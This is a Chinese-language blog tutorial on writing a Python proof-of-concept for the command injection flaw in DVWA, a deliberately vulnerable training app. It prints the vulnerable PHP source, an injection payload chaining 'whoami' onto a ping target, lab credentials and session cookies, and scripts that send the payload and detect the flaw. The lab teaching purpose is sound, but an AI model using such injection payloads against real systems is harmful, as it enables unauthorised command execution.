【黑客编程】手把手教你编写POC

1 概述

1.1 什么是POC?

POC(全称: Proof of concept), 中文译作概念验证。在安全界可以理解成漏洞验证程序。和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。

1.2 实验环境

PyCharm

Python 3.8.0

lxml 4.8.0

requests 2.27.1

mihun 1.0

DVWA 1.10

1.3 安装环境

pipinstall requests==2.27.1pipinstall bs4==0.0.1pipinstall lxml==4.8.0

2 分析漏洞

本次漏洞使用 DVWA(Damn Vulnerable Web App) 是一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。mihun渗透靶场 已经集成DVWA。

http://mihun-ip/

2.1 漏洞分析

user: admin

password: password

登入DVWA系统,将 DVWA Security 修改为low,本次使用 Command Injection(命令注入) 模块作为此次POC验证漏洞点

2.2 如何触发漏洞?

Command Injection(命令注入) 模块用于验证网络是否通畅,由于对输入的参数检查不严格导致任意命令执行

ping sechelper.cn && whoami

2.3 源码分析

Command Injection 模块源码

<?phpi

f(isset( $_POST['Submit']  ) ) {

// Get input

$target = $_REQUEST['ip'];

// Determine OS and execute the ping command.

if( stristr( php_uname('s'),'Windows NT') ) {

// Windows

$cmd = shell_exec('ping  '. $target );   

}

else{

// *nix

$cmd = shell_exec('ping  -c 4 '. $target );   

}

// Feedback for the end user

echo"<pre>{$cmd}</pre>";

}

?>

分析上面源码发现ip参数未过滤被带入命令执行函数shell_exec,利用linux/win命令特性拼接参数sechelper.cn&&whoami

伪代码如下:

shell_exec('ping  -c 4 '.$target) == shell_exec('ping  -c 4 sechelper.cn&&whoami');

3 编写验证程序

使用PyCharm创建一个python项目

3.1 分析http数据包

使用火狐浏览器按 F12 开启Firebug开发者模式,选择网络重新触发漏洞观察http请求

文件列 /vulnerabilities/exec/ 是接口地址,方法是 POST ,域名是 192.168.17.5 ,完整http请求包如下:

POST/vulnerabilities/exec/HTTP/1.1

Host: 192.168.17.5

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 17Origin: http://192.168.17.5Connection: keep-alive

Referer: http://192.168.17.5/vulnerabilities/exec/

Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low

Upgrade-Insecure-Requests: 1

ip=192.168.17.5&Submit=Submit

3.2 构建初版代码

漏洞的信息已经知道的差不多,开始编写代码

# coding=utf-8

import requests

url ="http://192.168.17.5/vulnerabilities/exec/"

data = {"ip":"sechelper.cn"}

# 禁止跳转 allow_redirects = Falseresponse = requests.post(url, data, allow_redirects=False)

print("状态: {}".format(response.status_code))

print("302跳转地址:{}".format(response.next.url))

执行上面代码返回状态 302,不应该是200 吗?为什么返回 302 ?,观察控制台内打印出的跳转地址是登入界面,原来/vulnerabilities/exec/有授权验证,未授权会跳转到登入界面

3.3 请求授权接口

怎么才能授权呢?

这里就不分析登入的过程了,登入信息保存在Cookie内,在请求头内加入 cookie

# coding=utf-8

import requests

url ="http://192.168.17.5/vulnerabilities/exec/"

# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low

headers = {"cookie":"PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low"}

data = {"ip":"sechelper.cn&&whoami","Submit":"Submit"}

# 禁止跳转 allow_redirects = False

response = requests.post(url, data, allow_redirects=False, headers=headers)

print("状态: {}".format(response.status_code))

print("结果:{}".format(response.text))

从结果内看出代码已经可以访问并利用 /vulnerabilities/exec/ 存在漏洞接口,那么如何使用代码快速识别出漏洞是否存在呢?

3.4 快速验证漏洞两种方法

特征方式匹配返回结果里的特征检测漏洞是否存在,匹配到 自定义 的字符则表示漏洞存在

# coding=utf-8

import requests

url ="http://192.168.17.5/vulnerabilities/exec/"

# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low

headers = {"cookie":"PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low"}

data = {"ip":"192.168.17.5&&echo sechelper","Submit":"Submit"}

# 禁止跳转 allow_redirects = False

response = requests.post(url, data, allow_redirects=False, headers=headers)

if response.status_code == 200 and response.text.find("sechelper") != -1:

print("[*] {} is weak".format(url))

else:

print("[x] {} is safe".format(url))

print("Detection completed...")

关键输出方式输出关键信息人工判断是否成功,一些复杂的漏洞利用需要使用这种方式

# coding=utf-8

import requests

url ="http://192.168.17.5/vulnerabilities/exec/"

# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low

headers = {"cookie":"PHPSESSID=3eabqr5lprmsir8n0211bolpn1; security=low"}

data = {"ip":"192.168.111.129&&echo sechelper","Submit":"Submit"}

# 禁止跳转 allow_redirects = False

response = requests.post(url, data, allow_redirects=False, headers=headers, timeout=5)

if response.status_code == 200:   

from bs4 import BeautifulSoup   

soup = BeautifulSoup(response.text, 'lxml')

# 在html找到第一个pre标签并返回,取出内容就是命令执行的结果

pre = soup.find("pre")

print("[*] response {}".format(pre.text))

print("Detection completed...")

4 结束语

渗透过程中自己写脚本可以更方便快捷的做一些事情,渗透测试很难全程自动化,写一些小工具可以显著提高渗透效率,想要做一个合格白帽子会一门语言是很有必要的。关注至察助安,专注网络安全优质知识分享,无优质,不分享。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,496评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,407评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,632评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,180评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,198评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,165评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,052评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,910评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,324评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,542评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,711评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,424评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,017评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,668评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,823评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,722评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,611评论 2 353

推荐阅读更多精彩内容